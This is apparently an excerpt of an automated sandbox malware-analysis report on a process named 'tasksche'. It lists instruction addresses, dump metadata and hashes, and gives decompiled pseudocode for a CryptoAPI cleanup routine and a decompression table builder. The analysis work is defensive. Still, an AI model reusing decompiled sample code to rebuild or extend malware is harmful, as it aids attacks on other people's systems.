                                                          0x00000000
                                                          0x004046ce
                                                          0x004046d2
                                                          0x00000000
                                                          0x00000000
                                                          0x004046d8
                                                          0x004046db
                                                          0x004046df
                                                          0x004046e2
                                                          0x004046e4
                                                          0x004046e7
                                                          0x004046e8
                                                          0x004046eb
                                                          0x004046eb
                                                          0x004046f0
                                                          0x004046f0
                                                          0x004046f3
                                                          0x004046f6
                                                          0x004046f9
                                                          0x004046fc
                                                          0x00404703
                                                          0x00404707
                                                          0x0040470b
                                                          0x0040470e
                                                          0x00404711
                                                          0x00404714
                                                          0x0040471a
                                                          0x0040471d
                                                          0x0040471d
                                                          0x00000000
                                                          0x0040462b
                                                          0x0040462b
                                                          0x0040462e
                                                          0x0040462e
                                                          0x00404631
                                                          0x00000000
                                                          0x00000000
                                                          0x00404633
                                                          0x00404637
                                                          0x00000000
                                                          0x00000000
                                                          0x0040463d
                                                          0x00404640
                                                          0x00404644
                                                          0x00404647
                                                          0x00404649
                                                          0x0040464c
                                                          0x0040464d
                                                          0x00404650
                                                          0x00404650
                                                          0x00404655
                                                          0x00404658
                                                          0x0040465d
                                                          0x0040465f
                                                          0x00404662
                                                          0x00404665
                                                          0x00404668
                                                          0x00404a7f
                                                          0x00404a7f
                                                          0x00404a85
                                                          0x00000000
                                                          0x00404a85
                                                          0x00404670
                                                          0x00404676
                                                          0x0040467c
                                                          0x00000000
                                                          0x00000000
                                                          0x00404682
                                                          0x00404685
                                                          0x00404695
                                                          0x00404698
                                                          0x0040469b
                                                          0x0040469e
                                                          0x004046a0
                                                          0x00000000
                                                          0x00000000
                                                          0x004046a6
                                                          0x004046aa
                                                          0x004046ae
                                                          0x004046ae
                                                          0x004046ae
                                                          0x004046b2
                                                          0x00000000
                                                          0x0040453a
                                                          0x0040453a
                                                          0x0040453e
                                                          0x00000000
                                                          0x00000000
                                                          0x00404544
                                                          0x00404546
                                                          0x004045d7
                                                          0x004045d7
                                                          0x004045da
                                                          0x004045dd
                                                          0x004045e1
                                                          0x004045e3
                                                          0x004045e6
                                                          0x004045e8
                                                          0x004045e8
                                                          0x004045eb
                                                          0x004045ee
                                                          0x004045f1
                                                          0x004045f3
                                                          0x004045f3
                                                          0x004045fd
                                                          0x00404602
                                                          0x00404605
                                                          0x00404608
                                                          0x0040460b
                                                          0x0040460e
                                                          0x00404611
                                                          0x00404613
                                                          0x00404613
                                                          0x00404613
                                                          0x00404616
                                                          0x0040461c
                                                          0x0040461f
                                                          0x00404621
                                                          0x00404623
                                                          0x00404469
                                                          0x00404469
                                                          0x00404469
                                                          0x00000000
                                                          0x00404616
                                                          0x0040454c
                                                          0x0040454f
                                                          0x00404551
                                                          0x00404575
                                                          0x00404578
                                                          0x0040457b
                                                          0x00404580
                                                          0x00404585
                                                          0x00404588
                                                          0x0040458b
                                                          0x00404591
                                                          0x00404593
                                                          0x00404596
                                                          0x004045a3
                                                          0x004045a6
                                                          0x004045a6
                                                          0x004045a9
                                                          0x00404598
                                                          0x0040459a
                                                          0x0040459d
                                                          0x0040459e
                                                          0x0040459e
                                                          0x004045ac
                                                          0x004045af
                                                          0x004045b2
                                                          0x004045b4
                                                          0x004045b7
                                                          0x004045b9
                                                          0x004045bb
                                                          0x004045be
                                                          0x004045c8
                                                          0x004045c8
                                                          0x004045ca
                                                          0x004045c0
                                                          0x004045c0
                                                          0x004045c2
                                                          0x004045c3
                                                          0x004045c3
                                                          0x004045be
                                                          0x004045b9
                                                          0x004045cd
                                                          0x004045d1
                                                          0x00404a44
                                                          0x00404a47
                                                          0x00404a4a
                                                          0x00404a4d
                                                          0x00404a50
                                                          0x00404a53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004045d1
                                                          0x00404553
                                                          0x00404556
                                                          0x00404559
                                                          0x0040455b
                                                          0x00000000
                                                          0x00000000
                                                          0x0040455d
                                                          0x00404560
                                                          0x0040456a
                                                          0x0040456a
                                                          0x0040456c
                                                          0x00404562
                                                          0x00404562
                                                          0x00404565
                                                          0x00404565
                                                          0x0040456f
                                                          0x00404573
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004044dc
                                                          0x004044dc
                                                          0x004044df
                                                          0x004044df
                                                          0x004044e2
                                                          0x00000000
                                                          0x00000000
                                                          0x004044e4
                                                          0x004044e8
                                                          0x00000000
                                                          0x00000000
                                                          0x004044ee
                                                          0x004044f1
                                                          0x004044f5
                                                          0x004044f8
                                                          0x004044fa
                                                          0x004044fd
                                                          0x004044fe
                                                          0x00404501
                                                          0x00404501
                                                          0x00404506
                                                          0x00404509
                                                          0x0040450c
                                                          0x0040450e
                                                          0x00404513
                                                          0x00404516
                                                          0x00404516
                                                          0x00404518
                                                          0x00404a12
                                                          0x00404a18
                                                          0x00000000
                                                          0x00404a18
                                                          0x0040451e
                                                          0x00404521
                                                          0x00404523
                                                          0x00404526
                                                          0x00404529
                                                          0x0040452c
                                                          0x00000000
                                                          0x00000000
                                                          0x00404534
                                                          0x00000000
                                                          0x00000000
                                                          0x0040440f
                                                          0x00404419
                                                          0x00000000
                                                          0x00000000
                                                          0x00404422
                                                          0x00404425
                                                          0x00404429
                                                          0x0040442e
                                                          0x00404431
                                                          0x00404432
                                                          0x00404432
                                                          0x0040443b
                                                          0x00404442
                                                          0x00404445
                                                          0x00404445
                                                          0x00404448
                                                          0x0040444b
                                                          0x004044b9
                                                          0x004044c3
                                                          0x004044c9
                                                          0x004044d1
                                                          0x004044d4
                                                          0x00000000
                                                          0x004044d4
                                                          0x0040444d
                                                          0x0040444d
                                                          0x0040444e
                                                          0x00404473
                                                          0x00404481
                                                          0x00404493
                                                          0x00404498
                                                          0x0040449b
                                                          0x0040449e
                                                          0x004044a0
                                                          0x00000000
                                                          0x00000000
                                                          0x004044a6
                                                          0x004044aa
                                                          0x004044ae
                                                          0x00000000
                                                          0x004044ae
                                                          0x00404450
                                                          0x00404450
                                                          0x00404451
                                                          0x0040445f
                                                          0x00404465
                                                          0x00404466
                                                          0x00404466
                                                          0x00404466
                                                          0x00000000
                                                          0x00404466
                                                          0x00404453
                                                          0x00404454
                                                          0x004049f7
                                                          0x00404a00
                                                          0x00404a07
                                                          0x00404a0d
                                                          0x00404a28
                                                          0x00404a28
                                                          0x00404a2e
                                                          0x00404a35
                                                          0x00404a37
                                                          0x00404a39
                                                          0x00404a3f
                                                          0x00000000
                                                          0x00404a3f
                                                          0x00000000
                                                          0x0040445a
                                                          0x00404a1f
                                                          0x00404a1f
                                                          0x00404a22
                                                          0x00404a25
                                                          0x00000000
                                                          0x00404b95
                                                          0x00404b95
                                                          0x00404b98
                                                          0x00404b9a
                                                          0x00404b9d
                                                          0x00404ba0
                                                          0x00404ba3
                                                          0x00404ba6
                                                          0x00404bab
                                                          0x00404bad
                                                          0x00404baf
                                                          0x00404bb2
                                                          0x00404bb5
                                                          0x00000000
                                                          0x00404b4a
                                                          0x00404b4d
                                                          0x00404b50
                                                          0x00404b55
                                                          0x00404b5a
                                                          0x00404b60
                                                          0x00404b63
                                                          0x00404b66
                                                          0x00404b8f
                                                          0x00000000
                                                          0x00404b8f
                                                          0x00404b68
                                                          0x00404b6b
                                                          0x00404b6e
                                                          0x00404b71
                                                          0x00404b74
                                                          0x00404b77
                                                          0x00404b7c
                                                          0x00404b7e
                                                          0x00404b80
                                                          0x00404b80
                                                          0x00404b80
                                                          0x00404b83
                                                          0x00404b86
                                                          0x00000000
                                                          0x00404b86

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
                                                          • Instruction ID: 90343a8667ee0670e87e021bba3e221c8adc0c1da1bb1a76252bfdf766af77e9
                                                          • Opcode Fuzzy Hash: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
                                                          • Instruction Fuzzy Hash: FB520CB5900609EFCB14CF69C580AAABBF1FF49315F10852EE95AA7780D338EA55CF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 16%
                                                          			E004018B9(void* __ecx) {
                                                          				signed int _t10;
                                                          				signed int _t11;
                                                          				long* _t12;
                                                          				void* _t13;
                                                          				void* _t18;
                                                          
                                                          				_t18 = __ecx;
                                                          				_t10 =  *(__ecx + 8);
                                                          				if(_t10 != 0) {
                                                          					 *0x40f89c(_t10);
                                                          					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
                                                          				}
                                                          				_t11 =  *(_t18 + 0xc);
                                                          				if(_t11 != 0) {
                                                          					 *0x40f89c(_t11);
                                                          					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
                                                          				}
                                                          				_t12 =  *(_t18 + 4);
                                                          				if(_t12 != 0) {
                                                          					CryptReleaseContext(_t12, 0);
                                                          					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
                                                          				}
                                                          				_t13 = 1;
                                                          				return _t13;
                                                          			}








                                                          0x004018ba
                                                          0x004018bc
                                                          0x004018c1
                                                          0x004018c4
                                                          0x004018ca
                                                          0x004018ca
                                                          0x004018ce
                                                          0x004018d3
                                                          0x004018d6
                                                          0x004018dc
                                                          0x004018dc
                                                          0x004018e0
                                                          0x004018e5
                                                          0x004018ea
                                                          0x004018f0
                                                          0x004018f0
                                                          0x004018f6
                                                          0x004018f8

                                                          APIs
                                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ContextCryptRelease
                                                          • String ID:
                                                          • API String ID: 829835001-0
                                                          • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                          • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                                                          • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                                                          • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00404C19(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32, signed int* _a36, signed char* _a40) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed char* _v20;
                                                          				intOrPtr _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				intOrPtr* _v36;
                                                          				void* _v40;
                                                          				char _v43;
                                                          				signed char _v44;
                                                          				signed int _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				char _v60;
                                                          				signed int _v64;
                                                          				signed int _v68;
                                                          				signed int _v72;
                                                          				signed int _v76;
                                                          				signed int _v80;
                                                          				signed int _v84;
                                                          				signed int _v88;
                                                          				signed int _v92;
                                                          				signed int _v96;
                                                          				signed int _v100;
                                                          				signed int _v104;
                                                          				signed int _v108;
                                                          				signed int _v112;
                                                          				char _v116;
                                                          				signed int _v120;
                                                          				signed int _v180;
                                                          				signed int _v184;
                                                          				signed int _v244;
                                                          				signed int _t190;
                                                          				intOrPtr* _t192;
                                                          				signed int _t193;
                                                          				void* _t194;
                                                          				void* _t195;
                                                          				signed int _t196;
                                                          				signed int _t199;
                                                          				intOrPtr _t203;
                                                          				intOrPtr _t207;
                                                          				signed char* _t211;
                                                          				signed char _t212;
                                                          				signed int _t214;
                                                          				signed int _t216;
                                                          				signed int _t217;
                                                          				signed int _t218;
                                                          				intOrPtr* _t220;
                                                          				signed int _t224;
                                                          				signed int _t225;
                                                          				signed int _t226;
                                                          				signed int _t228;
                                                          				intOrPtr _t229;
                                                          				signed int _t231;
                                                          				char _t233;
                                                          				signed int _t235;
                                                          				signed int _t236;
                                                          				signed int _t237;
                                                          				signed int _t241;
                                                          				signed int _t242;
                                                          				intOrPtr _t243;
                                                          				signed int* _t244;
                                                          				signed int _t246;
                                                          				signed int _t247;
                                                          				signed int* _t248;
                                                          				signed int _t249;
                                                          				intOrPtr* _t250;
                                                          				intOrPtr _t251;
                                                          				signed int _t252;
                                                          				signed char _t257;
                                                          				signed int _t266;
                                                          				signed int _t269;
                                                          				signed char _t271;
                                                          				intOrPtr _t275;
                                                          				signed char* _t277;
                                                          				signed int _t280;
                                                          				signed int _t282;
                                                          				signed int _t283;
                                                          				signed int _t284;
                                                          				intOrPtr* _t287;
                                                          				intOrPtr _t294;
                                                          				signed int _t296;
                                                          				intOrPtr* _t297;
                                                          				intOrPtr _t298;
                                                          				intOrPtr _t300;
                                                          				signed char _t302;
                                                          				void* _t306;
                                                          				signed int _t307;
                                                          				signed int _t308;
                                                          				intOrPtr* _t309;
                                                          				signed int _t312;
                                                          				signed int _t313;
                                                          				signed int _t314;
                                                          				signed int _t315;
                                                          				signed int _t319;
                                                          				intOrPtr _t320;
                                                          				unsigned int _t321;
                                                          				intOrPtr* _t322;
                                                          				void* _t323;
                                                          
                                                          				_t248 = _a4;
                                                          				_t296 = _a8;
                                                          				_t280 = 0;
                                                          				_v120 = 0;
                                                          				_v116 = 0;
                                                          				_v112 = 0;
                                                          				_v108 = 0;
                                                          				_v104 = 0;
                                                          				_v100 = 0;
                                                          				_v96 = 0;
                                                          				_v92 = 0;
                                                          				_v88 = 0;
                                                          				_v84 = 0;
                                                          				_v80 = 0;
                                                          				_v76 = 0;
                                                          				_v72 = 0;
                                                          				_v68 = 0;
                                                          				_v64 = 0;
                                                          				_v60 = 0;
                                                          				_t307 = _t296;
                                                          				do {
                                                          					_t190 =  *_t248;
                                                          					_t248 =  &(_t248[1]);
                                                          					 *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) =  *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) + 1;
                                                          					_t307 = _t307 - 1;
                                                          				} while (_t307 != 0);
                                                          				if(_v120 != _t296) {
                                                          					_t297 = _a28;
                                                          					_t241 = 1;
                                                          					_t192 =  &_v116;
                                                          					_t308 =  *_t297;
                                                          					_t249 = _t241;
                                                          					_a28 = _t308;
                                                          					while( *_t192 == _t280) {
                                                          						_t249 = _t249 + 1;
                                                          						_t192 = _t192 + 4;
                                                          						if(_t249 <= 0xf) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v8 = _t249;
                                                          					if(_t308 < _t249) {
                                                          						_a28 = _t249;
                                                          					}
                                                          					_t309 =  &_v60;
                                                          					_t193 = 0xf;
                                                          					while( *_t309 == _t280) {
                                                          						_t193 = _t193 - 1;
                                                          						_t309 = _t309 - 4;
                                                          						if(_t193 != _t280) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v28 = _t193;
                                                          					if(_a28 > _t193) {
                                                          						_a28 = _t193;
                                                          					}
                                                          					_t242 = _t241 << _t249;
                                                          					 *_t297 = _a28;
                                                          					if(_t249 >= _t193) {
                                                          						L20:
                                                          						_t312 = _t193 << 2;
                                                          						_t298 =  *((intOrPtr*)(_t323 + _t312 - 0x74));
                                                          						_t250 = _t323 + _t312 - 0x74;
                                                          						_t243 = _t242 - _t298;
                                                          						_v52 = _t243;
                                                          						if(_t243 < 0) {
                                                          							goto L39;
                                                          						}
                                                          						_v180 = _t280;
                                                          						 *_t250 = _t298 + _t243;
                                                          						_t251 = 0;
                                                          						_t195 = _t193 - 1;
                                                          						if(_t195 == 0) {
                                                          							L24:
                                                          							_t244 = _a4;
                                                          							_t300 = 0;
                                                          							do {
                                                          								_t196 =  *_t244;
                                                          								_t244 =  &(_t244[1]);
                                                          								if(_t196 != _t280) {
                                                          									_t252 =  *(_t323 + _t196 * 4 - 0xb4);
                                                          									 *((intOrPtr*)(_a40 + _t252 * 4)) = _t300;
                                                          									 *(_t323 + _t196 * 4 - 0xb4) = _t252 + 1;
                                                          									_t280 = 0;
                                                          								}
                                                          								_t300 = _t300 + 1;
                                                          							} while (_t300 < _a8);
                                                          							_v12 = _v12 | 0xffffffff;
                                                          							_a8 =  *((intOrPtr*)(_t323 + _t312 - 0xb4));
                                                          							_v16 = _t280;
                                                          							_v20 = _a40;
                                                          							_t199 = _v8;
                                                          							_t246 =  ~_a28;
                                                          							_v184 = _t280;
                                                          							_v244 = _t280;
                                                          							_v32 = _t280;
                                                          							_a4 = _t280;
                                                          							if(_t199 > _v28) {
                                                          								L64:
                                                          								if(_v52 == _t280 || _v28 == 1) {
                                                          									L4:
                                                          									return 0;
                                                          								} else {
                                                          									_push(0xfffffffb);
                                                          									goto L67;
                                                          								}
                                                          							}
                                                          							_v48 = _t199 - 1;
                                                          							_v36 = _t323 + _t199 * 4 - 0x74;
                                                          							do {
                                                          								_t203 =  *_v36;
                                                          								_v24 = _t203 - 1;
                                                          								if(_t203 == 0) {
                                                          									goto L63;
                                                          								} else {
                                                          									goto L31;
                                                          								}
                                                          								do {
                                                          									L31:
                                                          									_t207 = _a28 + _t246;
                                                          									if(_v8 <= _t207) {
                                                          										L46:
                                                          										_v43 = _v8 - _t246;
                                                          										_t257 = _a40 + _a8 * 4;
                                                          										_t211 = _v20;
                                                          										if(_t211 < _t257) {
                                                          											_t212 =  *_t211;
                                                          											if(_t212 >= _a12) {
                                                          												_t214 = _t212 - _a12 << 2;
                                                          												_v44 =  *((intOrPtr*)(_t214 + _a20)) + 0x50;
                                                          												_t302 =  *(_t214 + _a16);
                                                          											} else {
                                                          												_t302 = _t212;
                                                          												asm("sbb cl, cl");
                                                          												_v44 = (_t257 & 0x000000a0) + 0x60;
                                                          											}
                                                          											_v20 =  &(_v20[4]);
                                                          											L52:
                                                          											_t313 = 1;
                                                          											_t314 = _t313 << _v8 - _t246;
                                                          											_t216 = _v16 >> _t246;
                                                          											if(_t216 >= _a4) {
                                                          												L56:
                                                          												_t217 = 1;
                                                          												_t218 = _t217 << _v48;
                                                          												_t266 = _v16;
                                                          												while((_t266 & _t218) != 0) {
                                                          													_t266 = _t266 ^ _t218;
                                                          													_t218 = _t218 >> 1;
                                                          												}
                                                          												_v16 = _t266 ^ _t218;
                                                          												_t220 = _t323 + _v12 * 4 - 0xb4;
                                                          												while(1) {
                                                          													_t315 = 1;
                                                          													if(((_t315 << _t246) - 0x00000001 & _v16) ==  *_t220) {
                                                          														goto L62;
                                                          													}
                                                          													_v12 = _v12 - 1;
                                                          													_t220 = _t220 - 4;
                                                          													_t246 = _t246 - _a28;
                                                          												}
                                                          												goto L62;
                                                          											}
                                                          											_t277 = _v32 + _t216 * 8;
                                                          											do {
                                                          												_t216 = _t216 + _t314;
                                                          												 *_t277 = _v44;
                                                          												_t277[4] = _t302;
                                                          												_t277 = _t277 + (_t314 << 3);
                                                          											} while (_t216 < _a4);
                                                          											_t280 = 0;
                                                          											goto L56;
                                                          										}
                                                          										_v44 = 0xc0;
                                                          										goto L52;
                                                          									} else {
                                                          										goto L32;
                                                          									}
                                                          									do {
                                                          										L32:
                                                          										_t269 = _a28;
                                                          										_v12 = _v12 + 1;
                                                          										_t246 = _t246 + _t269;
                                                          										_v56 = _t207 + _t269;
                                                          										_t224 = _v28 - _t246;
                                                          										_a4 = _t224;
                                                          										if(_t224 > _t269) {
                                                          											_a4 = _t269;
                                                          										}
                                                          										_t271 = _v8 - _t246;
                                                          										_t225 = 1;
                                                          										_t226 = _t225 << _t271;
                                                          										_t282 = _v24 + 1;
                                                          										if(_t226 <= _t282) {
                                                          											L40:
                                                          											_t283 = 1;
                                                          											_t228 =  *_a36;
                                                          											_t284 = _t283 << _t271;
                                                          											_a4 = _t284;
                                                          											_t319 = _t228 + _t284;
                                                          											if(_t319 > 0x5a0) {
                                                          												goto L39;
                                                          											}
                                                          										} else {
                                                          											_t320 = _v36;
                                                          											_t236 = _t226 + (_t282 | 0xffffffff) - _v24;
                                                          											if(_t271 >= _a4) {
                                                          												goto L40;
                                                          											} else {
                                                          												goto L36;
                                                          											}
                                                          											while(1) {
                                                          												L36:
                                                          												_t271 = _t271 + 1;
                                                          												if(_t271 >= _a4) {
                                                          													goto L40;
                                                          												}
                                                          												_t294 =  *((intOrPtr*)(_t320 + 4));
                                                          												_t320 = _t320 + 4;
                                                          												_t237 = _t236 << 1;
                                                          												if(_t237 <= _t294) {
                                                          													goto L40;
                                                          												}
                                                          												_t236 = _t237 - _t294;
                                                          											}
                                                          											goto L40;
                                                          										}
                                                          										_t229 = _a32 + _t228 * 8;
                                                          										_v32 = _t229;
                                                          										_t287 = _t323 + _v12 * 4 - 0xf0;
                                                          										 *_t287 = _t229;
                                                          										 *_a36 = _t319;
                                                          										_t231 = _v12;
                                                          										if(_t231 == 0) {
                                                          											 *_a24 = _v32;
                                                          										} else {
                                                          											_t321 = _v16;
                                                          											 *(_t323 + _t231 * 4 - 0xb4) = _t321;
                                                          											_t233 = _a28;
                                                          											_v44 = _t271;
                                                          											_v43 = _t233;
                                                          											_t235 = _t321 >> _t246 - _t233;
                                                          											_t275 =  *((intOrPtr*)(_t287 - 4));
                                                          											_t302 = (_v32 - _t275 >> 3) - _t235;
                                                          											 *(_t275 + _t235 * 8) = _v44;
                                                          											 *(_t275 + 4 + _t235 * 8) = _t302;
                                                          										}
                                                          										_t207 = _v56;
                                                          									} while (_v8 > _t207);
                                                          									_t280 = 0;
                                                          									goto L46;
                                                          									L62:
                                                          									_v24 = _v24 - 1;
                                                          								} while (_v24 != 0);
                                                          								L63:
                                                          								_v8 = _v8 + 1;
                                                          								_v36 = _v36 + 4;
                                                          								_v48 = _v48 + 1;
                                                          							} while (_v8 <= _v28);
                                                          							goto L64;
                                                          						}
                                                          						_t306 = 0;
                                                          						do {
                                                          							_t251 = _t251 +  *((intOrPtr*)(_t323 + _t306 - 0x70));
                                                          							_t306 = _t306 + 4;
                                                          							_t195 = _t195 - 1;
                                                          							 *((intOrPtr*)(_t323 + _t306 - 0xb0)) = _t251;
                                                          						} while (_t195 != 0);
                                                          						goto L24;
                                                          					} else {
                                                          						_t322 = _t323 + _t249 * 4 - 0x74;
                                                          						while(1) {
                                                          							_t247 = _t242 -  *_t322;
                                                          							if(_t247 < 0) {
                                                          								break;
                                                          							}
                                                          							_t249 = _t249 + 1;
                                                          							_t322 = _t322 + 4;
                                                          							_t242 = _t247 << 1;
                                                          							if(_t249 < _t193) {
                                                          								continue;
                                                          							}
                                                          							goto L20;
                                                          						}
                                                          						L39:
                                                          						_push(0xfffffffd);
                                                          						L67:
                                                          						_pop(_t194);
                                                          						return _t194;
                                                          					}
                                                          				}
                                                          				 *_a24 = 0;
                                                          				 *_a28 = 0;
                                                          				goto L4;
                                                          			}







































































































                                                          0x00404c22
                                                          0x00404c28
                                                          0x00404c2b
                                                          0x00404c2d
                                                          0x00404c30
                                                          0x00404c33
                                                          0x00404c36
                                                          0x00404c39
                                                          0x00404c3c
                                                          0x00404c3f
                                                          0x00404c42
                                                          0x00404c45
                                                          0x00404c48
                                                          0x00404c4b
                                                          0x00404c4e
                                                          0x00404c51
                                                          0x00404c54
                                                          0x00404c57
                                                          0x00404c5a
                                                          0x00404c5d
                                                          0x00404c5f
                                                          0x00404c5f
                                                          0x00404c61
                                                          0x00404c64
                                                          0x00404c6c
                                                          0x00404c6c
                                                          0x00404c72
                                                          0x00404c85
                                                          0x00404c8a
                                                          0x00404c8b
                                                          0x00404c8e
                                                          0x00404c90
                                                          0x00404c92
                                                          0x00404c95
                                                          0x00404c99
                                                          0x00404c9a
                                                          0x00404ca0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404ca0
                                                          0x00404ca4
                                                          0x00404ca7
                                                          0x00404ca9
                                                          0x00404ca9
                                                          0x00404cae
                                                          0x00404cb1
                                                          0x00404cb2
                                                          0x00404cb6
                                                          0x00404cb7
                                                          0x00404cbc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404cbc
                                                          0x00404cc1
                                                          0x00404cc4
                                                          0x00404cc6
                                                          0x00404cc6
                                                          0x00404ccc
                                                          0x00404cd0
                                                          0x00404cd2
                                                          0x00404cea
                                                          0x00404cec
                                                          0x00404cef
                                                          0x00404cf3
                                                          0x00404cf7
                                                          0x00404cf9
                                                          0x00404cfc
                                                          0x00000000
                                                          0x00000000
                                                          0x00404d04
                                                          0x00404d0a
                                                          0x00404d0c
                                                          0x00404d0e
                                                          0x00404d0f
                                                          0x00404d24
                                                          0x00404d24
                                                          0x00404d27
                                                          0x00404d29
                                                          0x00404d29
                                                          0x00404d2b
                                                          0x00404d30
                                                          0x00404d32
                                                          0x00404d43
                                                          0x00404d47
                                                          0x00404d49
                                                          0x00404d49
                                                          0x00404d4b
                                                          0x00404d4c
                                                          0x00404d5b
                                                          0x00404d5f
                                                          0x00404d65
                                                          0x00404d68
                                                          0x00404d6b
                                                          0x00404d6e
                                                          0x00404d73
                                                          0x00404d79
                                                          0x00404d7f
                                                          0x00404d82
                                                          0x00404d85
                                                          0x00404f85
                                                          0x00404f88
                                                          0x00404c7e
                                                          0x00000000
                                                          0x00404f98
                                                          0x00404f98
                                                          0x00000000
                                                          0x00404f98
                                                          0x00404f88
                                                          0x00404d95
                                                          0x00404d98
                                                          0x00404d9b
                                                          0x00404d9e
                                                          0x00404da5
                                                          0x00404da8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404dae
                                                          0x00404dae
                                                          0x00404db1
                                                          0x00404db6
                                                          0x00404e9a
                                                          0x00404ea2
                                                          0x00404ea8
                                                          0x00404eab
                                                          0x00404eb0
                                                          0x00404eb8
                                                          0x00404ebd
                                                          0x00404ed9
                                                          0x00404ee2
                                                          0x00404ee8
                                                          0x00404ebf
                                                          0x00404ec4
                                                          0x00404ec6
                                                          0x00404ece
                                                          0x00404ece
                                                          0x00404eeb
                                                          0x00404eef
                                                          0x00404ef9
                                                          0x00404efa
                                                          0x00404efe
                                                          0x00404f03
                                                          0x00404f23
                                                          0x00404f28
                                                          0x00404f29
                                                          0x00404f2b
                                                          0x00404f2e
                                                          0x00404f32
                                                          0x00404f34
                                                          0x00404f34
                                                          0x00404f3d
                                                          0x00404f40
                                                          0x00404f47
                                                          0x00404f4b
                                                          0x00404f54
                                                          0x00000000
                                                          0x00000000
                                                          0x00404f56
                                                          0x00404f59
                                                          0x00404f5c
                                                          0x00404f5c
                                                          0x00000000
                                                          0x00404f47
                                                          0x00404f08
                                                          0x00404f0b
                                                          0x00404f0e
                                                          0x00404f10
                                                          0x00404f17
                                                          0x00404f1a
                                                          0x00404f1c
                                                          0x00404f21
                                                          0x00000000
                                                          0x00404f21
                                                          0x00404eb2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404dbc
                                                          0x00404dbc
                                                          0x00404dbc
                                                          0x00404dbf
                                                          0x00404dc4
                                                          0x00404dc6
                                                          0x00404dcc
                                                          0x00404dd0
                                                          0x00404dd3
                                                          0x00404dd5
                                                          0x00404dd5
                                                          0x00404de0
                                                          0x00404de2
                                                          0x00404de3
                                                          0x00404de5
                                                          0x00404de8
                                                          0x00404e17
                                                          0x00404e1c
                                                          0x00404e1d
                                                          0x00404e1f
                                                          0x00404e21
                                                          0x00404e24
                                                          0x00404e2d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404dea
                                                          0x00404dea
                                                          0x00404df3
                                                          0x00404df8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404dfa
                                                          0x00404dfa
                                                          0x00404dfa
                                                          0x00404dfe
                                                          0x00000000
                                                          0x00000000
                                                          0x00404e00
                                                          0x00404e03
                                                          0x00404e06
                                                          0x00404e0a
                                                          0x00000000
                                                          0x00000000
                                                          0x00404e0c
                                                          0x00404e0c
                                                          0x00000000
                                                          0x00404dfa
                                                          0x00404e32
                                                          0x00404e38
                                                          0x00404e3b
                                                          0x00404e42
                                                          0x00404e47
                                                          0x00404e49
                                                          0x00404e4e
                                                          0x00404e8a
                                                          0x00404e50
                                                          0x00404e50
                                                          0x00404e56
                                                          0x00404e5d
                                                          0x00404e60
                                                          0x00404e65
                                                          0x00404e6c
                                                          0x00404e6e
                                                          0x00404e79
                                                          0x00404e7b
                                                          0x00404e7e
